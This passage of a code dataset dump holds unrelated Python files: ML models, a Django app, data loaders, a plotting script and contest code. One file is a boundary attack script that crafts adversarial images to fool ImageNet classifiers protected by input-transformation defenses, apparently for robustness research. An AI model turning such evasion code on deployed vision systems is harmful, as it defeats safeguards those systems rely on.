self.init_params()\n\n self.x_data = T.imatrix('x_data')\n self.y_data = T.ivector('y_data')\n\n self.xmask = T.matrix('x_mask')\n\n self.h_enc_basic = self.encode(self.x_data, self.xmask)\n self.h_enc_emb = self.approx_embedder(self.x_data)\n self.h_enc = T.concatenate([self.h_enc_basic, self.h_enc_emb], axis=2)\n [self.pt, self.ot, self.alpha] = self.decode()\n \n self.cost = self.build_cost(self.pt,\n self.y_data)\n self.updates = self.compute_updates(self.cost, self.params)\n \n def init_params(self):\n self.W_emb = add_to_params(self.params, theano.shared(value=NormalInit(self.rng, self.word_dim, self.emb_dim), name='W_emb'+self.name))\n self.H_enc = add_to_params(self.params, theano.shared(value=NormalInit(self.rng, self.h_dim, self.h_dim), name='H_enc'+self.name))\n self.P_enc = add_to_params(self.params, theano.shared(value=NormalInit(self.rng, self.emb_dim, self.h_dim), name='P_enc'+self.name))\n self.U = add_to_params(self.params, theano.shared(value=NormalInit(self.rng, (self.h_dim + self.emb_dim), self.h_dim), name='U_dec'+self.name))\n self.O_z = add_to_params(self.params, theano.shared(value=NormalInit(self.rng, (self.h_dim + self.emb_dim), self.h_dim), name='O_z_dec'+self.name))\n self.out_emb = add_to_params(self.params, theano.shared(value=NormalInit(self.rng, self.h_dim, self.out_dim), 
name='out_emb'+self.name))\n self.b = add_to_params(self.params, theano.shared(value=np.zeros((self.h_dim,), dtype='float32'), name='b'+self.name))\n self.b = self.b.dimshuffle('x', 'x', 0)\n self.encode_b = add_to_params(self.params, theano.shared(value=np.zeros((self.h_dim,), dtype='float32'), name='encode_b'+self.name))\n self.reg_term = T.sum(self.H_enc**2) + T.sum(self.P_enc**2) + T.sum(self.U**2) + T.sum(self.O_z**2) + T.sum(self.b**2) + T.sum(self.encode_b**2)\n\n def approx_embedder(self, x):\n return self.W_emb[x]\n\n def encode(self, x_data, mask):\n if self.test_mode:\n batch_size = 2\n else:\n batch_size = self.bs\n emb_x = self.approx_embedder(x_data)\n def encode_step(x_t, h_tm1):\n h_t = self.active(T.dot(h_tm1, self.H_enc) + \\\n T.dot(x_t, self.P_enc) + \\\n self.encode_b)\n return h_t\n h_0 = T.alloc(np.float32(0), batch_size, self.h_dim)\n h_enc, _ = theano.scan(encode_step, \\\n sequences=[emb_x], \\\n outputs_info=[h_0])\n return h_enc\n\n def decode_step(self, h_enc, xmask, b):\n tmp = T.dot(h_enc, self.U)\n beta_t = T.sum(b * tmp, axis=2)\n alpha_t = T.exp(beta_t) * xmask / T.sum(T.exp(beta_t) * xmask, axis=0)\n z_tmp = h_enc * (alpha_t).dimshuffle(0, 1, 'x')\n z_t = T.sum(z_tmp, axis=0)\n g_t = T.dot(T.dot(z_t, self.O_z), self.out_emb)\n p_t = SoftMax(g_t)\n o_t = p_t.argmax(axis=1)\n return [p_t, o_t, alpha_t]\n \n def decode(self):\n batch_size = self.bs\n h_enc = self.h_enc\n xmask = self.xmask\n \n [p_t, o_t, alpha] = self.decode_step(h_enc, xmask, self.b)\n return [p_t, o_t, alpha]\n \n def build_cost(self, ot, abs_out):\n lamb = 0.01\n x_flatten = ot\n y_flatten = abs_out\n\n cost = x_flatten[T.arange(y_flatten.shape[0]), \\\n y_flatten]\n neg_log_cost_sum = T.sum(-T.log(cost))\n cost_res = neg_log_cost_sum / self.bs + lamb * self.reg_term\n\n self.pred = x_flatten.argmax(axis=1)\n self.acc = 1.0 * T.sum(T.eq(self.pred, y_flatten)) / self.bs\n return cost_res\n\n def build_train_function(self):\n if not hasattr(self, 'train_fn'):\n self.train_fn = \\\n theano.function(inputs=[self.x_data,\n self.xmask,\n self.y_data],\n outputs=[self.cost, \\\n self.acc],\n updates=self.updates,\n name=\"train_fn\")\n return self.train_fn\n\n def build_eval_function(self):\n if not hasattr(self, 'eval_fn'):\n self.eval_fn = \\\n theano.function(inputs=[self.x_data,\n self.xmask,\n self.y_data],\n outputs=[self.cost, \\\n self.acc],\n name=\"eval_fn\")\n return self.eval_fn\n\n def compute_updates(self, training_cost, params):\n updates = []\n \n grads = T.grad(training_cost, params)\n grads = OrderedDict(zip(params, grads))\n\n # Clip stuff\n c = numpy.float32(self.cutoff)\n clip_grads = []\n \n norm_gs = T.sqrt(sum(T.sum(g ** 2) for p, g in grads.items()))\n normalization = T.switch(T.ge(norm_gs, c), c / norm_gs, np.float32(1.))\n notfinite = T.or_(T.isnan(norm_gs), T.isinf(norm_gs))\n \n for p, g in grads.items():\n clip_grads.append((p, T.switch(notfinite, numpy.float32(.1) * p, g * normalization)))\n \n grads = OrderedDict(clip_grads)\n\n if self.updater == 'adagrad':\n updates = Adagrad(grads, self.lr) \n elif self.updater == 'sgd':\n raise Exception(\"Sgd not implemented!\")\n elif self.updater == 'adadelta':\n updates = Adadelta(grads)\n elif self.updater == 'rmsprop':\n updates = RMSProp(grads, self.lr)\n elif self.updater == 'adam':\n updates = Adam(grads)\n else:\n raise Exception(\"Updater not understood!\") \n\n return 
updates\n","sub_path":"attention_NLU/whenst_hour_model.py","file_name":"whenst_hour_model.py","file_ext":"py","file_size_in_byte":6984,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"60412698","text":"from __future__ import print_function\ntry:\n\traw_input\nexcept:\n\traw_input = input\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom matplotlib import gridspec\nfrom keras.datasets import mnist\nimport pickle\nimport time\nimport datetime\nimport os\nfrom PIL import Image\nimport json\nimport sys\nfrom robustml_model import InputTransformations\n\nimport tensorflow as tf\n\n\nimport robustml\n\n\ndef orthogonal_perturbation(delta, prev_sample, target_sample):\n\tprev_sample = prev_sample.reshape(299, 299, 3)\n\t# Generate perturbation\n\tperturb = np.random.randn(299, 299, 3)\n\tperturb /= get_diff(perturb, np.zeros_like(perturb))\n\tperturb *= delta * np.mean(get_diff(target_sample, prev_sample))\n\t# Project perturbation onto sphere around target\n\tdiff = (target_sample - prev_sample).astype(np.float32)\n\tdiff /= get_diff(target_sample, prev_sample)\n\tdiff = diff.reshape(3, 299, 299)\n\tperturb = perturb.reshape(3, 299, 299)\n\tfor i, channel in enumerate(diff):\n\t\tperturb[i] -= np.dot(perturb[i], channel) * channel\n\t# Check overflow and underflow\n# \tmean = [103.939, 116.779, 123.68]\n\tmean = [0.0, 0.0, 0.0]\n\tperturb = perturb.reshape(299, 299, 3)\n\toverflow = (prev_sample + perturb) - np.concatenate((np.ones((299, 299, 1)) * (255. - mean[0]), np.ones((299, 299, 1)) * (255. - mean[1]), np.ones((299, 299, 1)) * (255. - mean[2])), axis=2)\n\toverflow = overflow.reshape(299, 299, 3)\n\tperturb -= overflow * (overflow > 0)\n\tunderflow = np.concatenate((np.ones((299, 299, 1)) * (0. - mean[0]), np.ones((299, 299, 1)) * (0. - mean[1]), np.ones((299, 299, 1)) * (0. 
- mean[2])), axis=2) - (prev_sample + perturb)\n\tunderflow = underflow.reshape(299, 299, 3)\n\tperturb += underflow * (underflow > 0)\n\treturn perturb\n\ndef forward_perturbation(epsilon, prev_sample, target_sample):\n\tperturb = (target_sample - prev_sample).astype(np.float32)\n\tperturb /= get_diff(target_sample, prev_sample)\n\tperturb *= epsilon\n\treturn perturb\n\ndef get_converted_prediction(sample, classifier):\n\tsample = sample.reshape(299, 299, 3)\n\tmean = [103.939, 116.779, 123.68]\n\tsample[..., 0] += mean[0]\n\tsample[..., 1] += mean[1]\n\tsample[..., 2] += mean[2]\n\tsample = sample[..., ::-1].astype(np.uint8)\n\tsample = sample.astype(np.float32).reshape(1, 299, 299, 3)\n\tsample = sample[..., ::-1]\n\tmean = [103.939, 116.779, 123.68]\n\tsample[..., 0] -= mean[0]\n\tsample[..., 1] -= mean[1]\n\tsample[..., 2] -= mean[2]\n\tlabel = decode_predictions(classifier.predict(sample), top=1)[0][0][1]\n\treturn label\n\ndef draw(sample, classifier, folder):\n\tlabel = get_converted_prediction(np.copy(sample), classifier)\n\tsample = sample.reshape(299, 299, 3)\n\t# Reverse preprocessing, see https://github.com/keras-team/keras/blob/master/keras/applications/imagenet_utils.py\n\tmean = [103.939, 116.779, 123.68]\n\tsample[..., 0] += mean[0]\n\tsample[..., 1] += mean[1]\n\tsample[..., 2] += mean[2]\n\tsample = sample[..., ::-1].astype(np.uint8)\n\t# Convert array to image and save\n\tsample = Image.fromarray(sample)\n\tid_no = time.strftime('%Y%m%d_%H%M%S', datetime.datetime.now().timetuple())\n\t# Save with predicted label for image (may not be adversarial due to uint8 conversion)\n\tsample.save(os.path.join(\"images\", folder, \"{}_{}.png\".format(id_no, label)))\n\ndef preprocess(sample_path):\n\timg = image.load_img(sample_path, target_size=(299, 299))\n\tx = image.img_to_array(img)\n\tx = np.expand_dims(x, axis=0)\n\tx = preprocess_input(x)\n\treturn x\n\ndef get_diff(sample_1, sample_2):\n\tsample_1 = sample_1/255\n\tsample_2 = sample_2/255\n\tsample_1 = sample_1.reshape(3, 299, 299)\n\tsample_2 = sample_2.reshape(3, 299, 299)\n\tdiff = []\n\tfor i, channel in enumerate(sample_1):\n\t\tdiff.append(np.linalg.norm((channel - sample_2[i]).astype(np.float32)))\n\treturn np.array(diff)\n\ndef boundary_attack():\n\t\n\t\n\t\n\n\tl2thresh = 0.05 * np.sqrt(299*299)\n\n\n\tconfig = tf.ConfigProto()\n\tconfig.gpu_options.allow_growth = True\n\tsess = tf.Session(config=config)\n\n\tdefense = 'jpeg' # 'bitdepth | jpeg | crop | quilt | tv' ############# change ##############################\n\tmodel = InputTransformations(sess,defense)\n\timagenet_path = '../imagenetval'\n\t\n\tprovider = robustml.provider.ImageNet(imagenet_path, model.dataset.shape)\n\n\tstart = 0\n\tend = 500\n\twrongexample = 0\n\ttotalImages = 0\n\tsuccImages = 0\n\tfor i in range(start,end):\n\t\tinputs, targets = provider[i]\n\t\tlogits = model.outlogits(inputs.reshape(1,299,299,3))\n\t\tprint('evaluating %d of [%d, %d]' % (i, start, end))\n\t\tsys.stdout.flush()\n\n\t\tif np.argmax(logits) != targets:\n\t\t\twrongexample += 1\n\t\t\tprint('skip the wrong example ', i)\n\t\t\tsys.stdout.flush()\n\t\t\tcontinue\n\t\t\t \n\t\ttotalImages += 1\n\t\ttarget_tem = i+1\n\t\twhile True:\n\t\t\ttarget_x, target_y = provider[target_tem]\n\t\t\tif target_y != targets:\n\t\t\t\tbreak\n\t\t\ttarget_tem += 1\n\t\t\n\t\t\t\n\t\tinitial_sample = inputs * 255\n\t\ttarget_sample = target_x * 255\n\t \t\n\t\tfolder = time.strftime('%Y%m%d_%H%M%S', datetime.datetime.now().timetuple())\n\t\tos.mkdir(os.path.join(\"images\", folder))\n# 
\t\tdraw(np.copy(initial_sample), classifier, folder)\n\t\tattack_class = np.argmax(model.outlogits(initial_sample.reshape(1,299,299,3)/255))\n\t\ttarget_class = np.argmax(model.outlogits(target_sample.reshape(1,299,299,3)/255))\n\t \n\t\tadversarial_sample = initial_sample\n\t\tn_steps = 0\n\t\tn_calls = 0\n\t\tepsilon = 1.\n\t\tdelta = 0.5\n\t \n\t\t# Move first step to the boundary\n\t\twhile True:\n\t\t\ttrial_sample = adversarial_sample + forward_perturbation(epsilon * get_diff(adversarial_sample, target_sample), adversarial_sample, target_sample)\n\t\t\tprediction = model.outlogits(trial_sample.reshape(1, 299, 299, 3)/255)\n\t\t\tn_calls += 1\n\t\t\tif np.argmax(prediction) == attack_class:\n\t\t\t\tadversarial_sample = trial_sample\n\t\t\t\tbreak\n\t\t\telse:\n\t\t\t\tepsilon *= 0.9\n\t \n# \t\twhile True:\n# \t\t\tprint(\"Step #{}...\".format(n_steps))\n# \t\t\tprint(\"\\tDelta step...\")\n\t\tsuccessflag = False\n\t\tfor attack_step in range(2000):\n\t\t\td_step = 0\n\t\t\twhile True:\n\t\t\t\td_step += 1\n# \t\t\t\tprint(\"\\t#{}\".format(d_step))\n\t\t\t\ttrial_samples = []\n\t\t\t\tfor i in np.arange(10):\n\t\t\t\t\ttrial_sample = adversarial_sample + orthogonal_perturbation(delta, adversarial_sample, target_sample)\n\t\t\t\t\ttrial_samples.append(trial_sample)\n\t\t\t\tpredictions = model.outlogits(np.array(trial_samples).reshape(-1, 299, 299, 3)/255)\n\t\t\t\tn_calls += 10\n\t\t\t\tpredictions = np.argmax(predictions, axis=1)\n\t\t\t\td_score = np.mean(predictions == attack_class)\n\t\t\t\tif d_score > 0.0:\n\t\t\t\t\tif d_score < 0.3:\n\t\t\t\t\t\tdelta *= 0.9\n\t\t\t\t\telif d_score > 0.7:\n\t\t\t\t\t\tdelta /= 0.9\n\t\t\t\t\tadversarial_sample = np.array(trial_samples)[np.where(predictions == attack_class)[0][0]]\n\t\t\t\t\tbreak\n\t\t\t\telse:\n\t\t\t\t\tdelta *= 0.9\n# \t\t\tprint(\"\\tEpsilon step...\")\n\t\t\te_step = 0\n\t\t\twhile True:\n\t\t\t\te_step += 1\n# \t\t\t\tprint(\"\\t#{}\".format(e_step))\n\t\t\t\ttrial_sample = adversarial_sample + forward_perturbation(epsilon * get_diff(adversarial_sample, target_sample), adversarial_sample, target_sample)\n\n\t\t\t\tprediction = model.outlogits(trial_sample.reshape(1, 299, 299, 3)/255)\t\t\t\t\n\t\t\t\tn_calls += 1\n\t\t\t\tif np.argmax(prediction) == attack_class:\n\t\t\t\t\tadversarial_sample = trial_sample\n\t\t\t\t\tepsilon /= 0.5\n\t\t\t\t\tbreak\n\t\t\t\telif e_step > 500:\n\t\t\t\t\t\tbreak\n\t\t\t\telse:\n\t\t\t\t\tepsilon *= 0.5\n\t\t\tn_steps += 1\n# \t\t\tchkpts = [1, 5, 10, 50, 100, 500, 1000]\n# \t\t\tif (n_steps in chkpts) or (n_steps % 500 == 0):\n# \t\t\t\tprint(\"{} steps\".format(n_steps))\n# \t\t\t\tdraw(np.copy(adversarial_sample), classifier, folder)\n\t\t\tdiff = np.mean(get_diff(adversarial_sample, target_sample))\n\t\t\trealdiff = np.sum((adversarial_sample/255 - target_sample/255 )**2)**0.5\n\t\t\tif e_step > 500:\n\t\t\t\tprint(\"{} steps\".format(n_steps))\n\t\t\t\tprint(\"Mean Squared Error: {}\".format(diff))\n\t\t\t\tsys.stdout.flush()\n# \t\t\t\tdraw(np.copy(adversarial_sample), classifier, folder)\n\t\t\t\tbreak\n\t\t\tif realdiff <= l2thresh:\n\t\t\t\tsuccessflag = True\n\t\t\t\tsuccImages += 1\n\t\t\t\tprint('clipimage succImages: '+str(succImages)+' totalImages: '+str(totalImages))\n\t\t\t\tsys.stdout.flush()\n\t\t\t\tbreak\n\t\t\tif attack_step % 50 == 0:\n\t\t\t\tprint(\"Mean Squared Error: {}\".format(diff))\n\t\t\t\tprint(\"{} steps\".format(n_steps))\n\t\t\t\tprint(\"Real Mean Squared Error: {}\".format(realdiff))\n# \t\t\t\tprint(\"Calls: 
{}\".format(n_calls))\n\t\t\t\tprint(\"Attack Class: {}\".format(attack_class))\n\t\t\t\tprint(\"Target Class: {}\".format(target_class))\n\t\t\t\tprint(\"Adversarial Class: {}\".format(np.argmax(prediction)))\n\t\t\t\tsys.stdout.flush()\n\tprint(wrongexample)\n \t\n\n\n\n\nif __name__ == \"__main__\":\n\tboundary_attack()\n\n\n\n\n\n","sub_path":"boundary-attack-input.py","file_name":"boundary-attack-input.py","file_ext":"py","file_size_in_byte":8244,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"148990466","text":"import numpy as np\nfrom matplotlib.pyplot import figure, show\nfrom matplotlib.patches import Arc\nfrom matplotlib.cm import copper\n\nfig = figure()\nframe = fig.add_subplot(1,1,1)\nn = 2000\nx = np.random.random_sample(n)\ny = np.random.random_sample(n)\nradius = x**2 + y**2\nIn = (radius <= 1.0)\nOut = (radius > 1.0)\nframe.plot(x[In], y[In], 'g.')\nframe.plot(x[Out], y[Out], 'r.')\narc = Arc((0,0), 2,2, 0,0, 90)\nframe.add_patch(arc)\nframe.imshow([[0, 0],[1,1]], interpolation='bicubic', cmap=copper,\n vmin=-0.5, vmax=0.5,\n extent=(frame.get_xlim()[0], frame.get_xlim()[1],\n frame.get_ylim()[0], frame.get_ylim()[1]),\n alpha=1)\n\nframe.set_xlim(0,1)\nframe.set_ylim(0,1)\nframe.set_aspect(1.0)\nshow()\n","sub_path":"docs/tools/ReST/template/circlemc.py","file_name":"circlemc.py","file_ext":"py","file_size_in_byte":747,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"309233876","text":"# https://github.com/Namkyeong/RecSys_paper/blob/main/MatrixFactorization/data.py\n\nimport sys\nsys.path.append(\"..\")\n\nimport numpy as np\nimport pandas as pd\n\n# pass in column names for each CSV\nr_cols = ['user_id', 'movie_id', 'rating', 'unix_timestamp']\ndf = pd.read_csv('ml-100k/u.data', sep='\\t', names=r_cols)\ntrain_df = pd.read_csv('ml-100k/ua.base', sep='\\t', names=r_cols)\ntest_df = pd.read_csv('ml-100k/ua.test', sep='\\t', names=r_cols)\n\nn_users = df.user_id.unique().shape[0]\nn_movies = df.movie_id.unique().shape[0]\n\nml_100k = np.zeros((n_users, n_movies))\ntrain = np.zeros((n_users, n_movies))\ntest = np.zeros((n_users, n_movies))\n\nfor row in df.itertuples():\n ml_100k[row[1]-1, row[2]-1] = row[3]\n\nfor row in train_df.itertuples():\n train[row[1]-1, row[2]-1] = row[3]\n \nfor row in test_df.itertuples():\n test[row[1]-1, row[2]-1] = row[3]\n\n ","sub_path":"RecSys/PMF/data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":865,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"605932342","text":"from django.conf.urls import patterns, url\nfrom etests import views\n\nurlpatterns = patterns('',\n url(r'^testset/$', views.testset, name='testset'),\n url(r'^testset/new$', views.testset_create, name='testset_new'),\n url(r'^testset/edit/(?P\\d+)$', views.testset_update, name='testset_edit'),\n url(r'^testset/delete/(?P\\d+)$', views.testset_delete, name='testset_delete'),\n url(r'^testsetline/edit/(?P\\d+)$', views.testsetline_update, name='testsetline_edit'),\n url(r'^testsetline/delete/(?P\\d+)$', views.testsetline_delete, name='testsetline_delete'),\n url(r'^testq/$', views.testq, name='testq'),\n url(r'^etest/$', views.etest, name='etest'),\n url(r'^etest/(\\d{1,2})/$', views.etest, name='etest'),\n url(r'^etest/testlist$', views.testlist, name='testlist'),\n url(r'^etest/sr/(\\d{1,2})/$', views.etestsr, name='etestsr'),\n url(r'^etest/ans/(\\d{1,2})/$', views.etestans, 
name='etestans'),\n url(r'^etest/add/$', views.add_testset, name='add_testset'),\n url(r'^etest/phoneticslist$', views.phoneticslist, name='phoneticslist'),\n #url(r'^etest/phonetics_display$', views.phonetics_display, name='phonetics_display'),\n url(r'^etest/phonetics/(\\d{1,2})/$', views.phonetics, name='phone'),\n )\n","sub_path":"tinytotts/etests/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1320,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"539171380","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('shop', '0052_auto_20150325_1445'),\n ]\n\n operations = [\n migrations.AlterField(\n model_name='supplier',\n name='bank_data',\n field=models.TextField(null=True, verbose_name=b'\\xd0\\x91\\xd0\\xb0\\xd0\\xbd\\xd0\\xba\\xd0\\xbe\\xd0\\xb2\\xd1\\x81\\xd0\\xba\\xd0\\xb8\\xd0\\xb5 \\xd1\\x80\\xd0\\xb5\\xd0\\xba\\xd0\\xb2\\xd0\\xb8\\xd0\\xb7\\xd0\\xb8\\xd1\\x82\\xd1\\x8b', blank=True),\n ),\n migrations.AlterField(\n model_name='supplier',\n name='contact',\n field=models.TextField(null=True, verbose_name=b'\\xd0\\x9a\\xd0\\xbe\\xd0\\xbd\\xd1\\x82\\xd0\\xb0\\xd0\\xba\\xd1\\x82\\xd0\\xbd\\xd0\\xbe\\xd0\\xb5 \\xd0\\xbb\\xd0\\xb8\\xd1\\x86\\xd0\\xbe', blank=True),\n ),\n migrations.AlterField(\n model_name='supplier',\n name='fact_address',\n field=models.TextField(null=True, verbose_name=b'\\xd0\\xa4\\xd0\\xb0\\xd0\\xba\\xd1\\x82\\xd0\\xb8\\xd1\\x87\\xd0\\xb5\\xd1\\x81\\xd0\\xba\\xd0\\xb8\\xd0\\xb9 \\xd0\\xb0\\xd0\\xb4\\xd1\\x80\\xd0\\xb5\\xd1\\x81', blank=True),\n ),\n migrations.AlterField(\n model_name='supplier',\n name='law_address',\n field=models.TextField(null=True, verbose_name=b'\\xd0\\xae\\xd1\\x80\\xd0\\xb8\\xd0\\xb4\\xd0\\xb8\\xd1\\x87\\xd0\\xb5\\xd1\\x81\\xd0\\xba\\xd0\\xb8\\xd0\\xb9 \\xd0\\xb0\\xd0\\xb4\\xd1\\x80\\xd0\\xb5\\xd1\\x81', blank=True),\n ),\n ]\n","sub_path":"shop/migrations/0053_auto_20150329_1630.py","file_name":"0053_auto_20150329_1630.py","file_ext":"py","file_size_in_byte":1509,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"271305226","text":"'''\nID: romario5\nLANG: PYTHON\nPROG: ride\n'''\n\ndef cnt(s):\n r = 1\n for c in s:\n r *= (ord(c) - ord('A') + 1)\n return r % 47\n\ndef solve(comet, group):\n if cnt(comet) == cnt(group):\n return \"GO\"\n return \"STAY\"\n\ndef go():\n problem = 'ride'\n ifile = open(problem + '.in', 'r')\n ofile = open(problem + '.out', 'w')\n try:\n comet = ifile.readline()\n group = ifile.readline()\n r = solve(comet, group)\n ofile.writelines(r)\n finally:\n ofile.close()\n\n# print solve('COMETQ', 'HVNGAT')\ngo()\n","sub_path":"ride.py","file_name":"ride.py","file_ext":"py","file_size_in_byte":557,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"446240859","text":"\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nfrom collections import Counter\nfrom torch.utils import data\nimport torch\nimport torch.nn as nn\nimport numpy as np\n#import graph\n\ndef sample_or_pad(arr, max_size, pad_value = -1):\n arr_shape = arr.shape\n\n if arr.size == 0:\n\n if isinstance(pad_value, list):\n result = np.ones((max_size, len(pad_value)), dtype = arr.dtype) * pad_value\n \n else:\n\n result = np.ones((max_size,), dtype = arr.dtype) * pad_value\n\n elif 
arr.shape[0]>max_size:\n\n if arr.ndim == 1:\n result = np.random.choice(arr, size = max_size, replace = False)\n else:\n \n idx = np.arange(arr.shape[0])\n np.random.shuffle(idx)\n result = arr[idx[:max_size], :]\n else:\n padding = np.ones((max_size - arr.shape[0],) + arr_shape[1:], dtype = arr.dtype)\n\n if isinstance(pad_value, list):\n for i in range(len(pad_value)):\n padding[..., i] *= pad_value[i]\n else:\n padding *= pad_value\n result = np.concatenate((arr, padding), axis = 0)\n\n return result \ndef get_graph_nbrhd_with_rels(train_graph, ent, exclude_tuple):\n \"\"\"Helper to get neighbor (rels, ents) excluding a particular tuple.\"\"\"\n es, er, et = exclude_tuple\n neighborhood = [[r, nbr] for nbr in train_graph.kg_data[ent]\n for r in train_graph.kg_data[ent][nbr]\n # if r != er]\n if ent != es or nbr != et or r != er]\n if not neighborhood:\n neighborhood = [[]]\n # if train_graph.add_reverse_graph:\n # rev_nighborhood = [nbr for nbr in train_graph.reverse_kg_data[ent]\n # if ent != et or nbr != es or\n # # er not in train_graph.reverse_kg_data[ent][nbr]]\n # (train_graph.reverse_kg_data[ent][nbr] - set([er]))]\n # neighborhood += rev_nighborhood\n neighborhood = np.array(neighborhood, dtype=np.int)\n return neighborhood\n\ndef get_graph_nbrhd(train_graph, ent, exclude_tuple):\n es, er, et = exclude_tuple\n\n neighbourhood = [nbr for nbr in train_graph.kg_data[ent]\n if ent != es or nbr != et or \n er not in train_graph.kg_data[ent][nbr]]\n #(train_graph.kg_data[ent][nbr] - set([er]))]\n \n neighbourhood = np.array(list(set(neighbourhood)), dtype = np.int)\n \n return neighbourhood\n\n\nclass MyDataset(data.Dataset):\n\n def __init__(self, data_graph, train_graph=None, mode=\"train\",\n max_negatives=10, max_neighbours=10, num_epochs=20,\n batchsize=64, model_type=\"attention\", val_graph=None, add_inverse = False):\n\n if not train_graph:\n train_graph = data_graph\n \n self.train_graph = train_graph\n self.data_graph = data_graph\n self.mode = mode\n self.augmented_tuple_store = None\n self.add_inverse = add_inverse\n\n\n if mode != \"train\":\n\n if max_negatives:\n self.max_negatives = max_negatives\n else:\n self.max_negatives = train_graph.ent_vocab_size-1\n\n else:\n if not max_negatives and mode == \"train\":\n\n raise ValueError(\"Must provide max_negatives value for training\")\n \n self.max_negatives = max_negatives\n \n if max_neighbours:\n self.max_neighbours = max_neighbours\n else:\n self.max_neighbours = train_graph.max_neighbours\n self.input_tensors = None\n self.output_shapes = None\n self.model_type = model_type\n self.val_graph = val_graph\n\n # if mode == \"train\":\n # self.augmented_tuple_store = []\n # for example in train_graph.tuple_store:\n # s, r, t = example\n # self.augmented_tuple_store.append((s,r,t, True))\n # self.augmented_tuple_store.append((s,r,t, False))\n \n # self.augmented_tuple_store = np.array(self.augmented_tuple_store)\n \n #print(self.augmented_tuple_store)\n\n if mode == \"train\" and self.add_inverse:\n self.augmented_tuple_store = []\n for example in train_graph.tuple_store:\n s, r, t = example\n self.augmented_tuple_store.append((s,r,t, True))\n self.augmented_tuple_store.append((s,r,t, False))\n \n self.augmented_tuple_store = np.array(self.augmented_tuple_store)\n \n\n \n \n def featurize_example(self, example_tuple):\n\n s, r, t, reverse = example_tuple\n\n if not reverse:\n all_targets = self.train_graph.all_reachable_e2[(s, r)]\n if self.mode != \"train\":\n all_targets |= self.data_graph.all_reachable_e2[(s,r)]\n if 
self.val_graph:\n all_targets |= self.val_graph.all_reachable_e2[(s,r)]\n \n else:\n\n all_targets = self.train_graph.all_reachable_e2_reverse[(t,r)]\n\n if self.mode != \"train\":\n\n all_targets |= self.data_graph.all_reachable_e2_reverse[(t,r)]\n\n if self.val_graph:\n all_targets |= self.val_graph.all_reachable_e2_reverse[(t,r)]\n \n s, t = t, s\n\n candidate_negatives = list(self.train_graph.all_entities - (all_targets | set([t]) | set([self.train_graph.ent_pad])))\n negatives = sample_or_pad(np.array(candidate_negatives, dtype = np.int), self.max_negatives, pad_value = self.train_graph.ent_pad)\n\n\n candidates = np.insert(negatives, 0, t, axis = 0)\n\n nbrhd_fn = get_graph_nbrhd_with_rels\n #pad_value = self.train_graph.ent_pad\n pad_value = [self.train_graph.rel_pad, self.train_graph.ent_pad]\n\n nbrs_s = sample_or_pad(nbrhd_fn(self.train_graph, s, (s,r,t)), self.max_neighbours, pad_value = pad_value)\n # nbrs_t = sample_or_pad(nbrhd_fn(self.train_graph, t, (s,r,t)), self.max_neighbours, pad_value = pad_value)\n # nbrs_negatives = np.array([sample_or_pad(nbrhd_fn(self.train_graph, cand, (s,r,t)), \n # self.max_neighbours, pad_value = pad_value) for cand in negatives])\n\n #nbrs_candidates = np.concatenate((np.expand_dims(nbrs_t, 0), nbrs_negatives), axis = 0)\n nbrs_candidates = np.array([], dtype=np.int)\n\n\n if self.mode != \"train\":\n labels = [t]\n \n else:\n \n labels = np.zeros(candidates.shape[0], dtype = np.int)\n labels[0] = 1\n idx = np.arange(candidates.shape[0])\n np.random.shuffle(idx)\n candidates = candidates[idx]\n\n #nbrs_candidates = nbrs_candidates[idx]\n labels = labels[idx]\n \n return s, nbrs_s, r, candidates, nbrs_candidates, labels\n\n\n def __len__(self):\n \n if self.add_inverse:\n return len(self.augmented_tuple_store)\n else:\n return len(self.data_graph.tuple_store)\n\n \n def __getitem__(self, index):\n\n if self.add_inverse:\n\n return self.featurize_example(self.augmented_tuple_store[index])\n else:\n s, r, t = self.data_graph.tuple_store[index]\n return self.featurize_example((s,r,t,True))\n\n\n ","sub_path":"dataset.py","file_name":"dataset.py","file_ext":"py","file_size_in_byte":7508,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"391953788","text":"from random import random\nfrom math import sqrt\nfrom itertools import product\n\n\ndef calcAccuracy(gamma, d):\n return (1.0 / 2) * (1.0 + (1.0 - d) ** gamma)\n\n\ndef calcBallotProb(ballots, answer, d):\n totalProb = 1.0\n for i in range(0, len(ballots)):\n prob = 0.0\n if ballots[i] == answer:\n prob = calcAccuracy(1, d)\n else:\n prob = (1 - calcAccuracy(1, d))\n totalProb *= prob\n return totalProb\n\n\ndef normalize(array):\n sum = 0.0\n for i in range(0, len(array)):\n sum += array[i]\n for i in range(0, len(array)):\n array[i] = array[i] / sum\n return array\n\n\ndef dot(v1, v2):\n sum = 0.0\n for i in range(0, len(v1)):\n if v1[i] == '*' or v2[i] == '*':\n continue\n sum += v1[i] * v2[i]\n return sum\n\n\ndef generateBallot(gamma, d, answer):\n a = random()\n if a < calcAccuracy(gamma, d):\n return answer\n else:\n return 1 - answer\n\n\n# Generate discrete difficulties between 0 and 1 at diffInterval steps\ndef getDifficulties(diffInterval):\n difficulties = []\n numDiffs = int(1.0 / diffInterval + 1)\n for i in range(0, numDiffs):\n difficulties.append(round(diffInterval * i, 1))\n return difficulties\n\n\ndef findBestAction(actions, policy, beliefState):\n bestValue = -1230981239102938019\n bestAction = 0 #Assume there is at least 
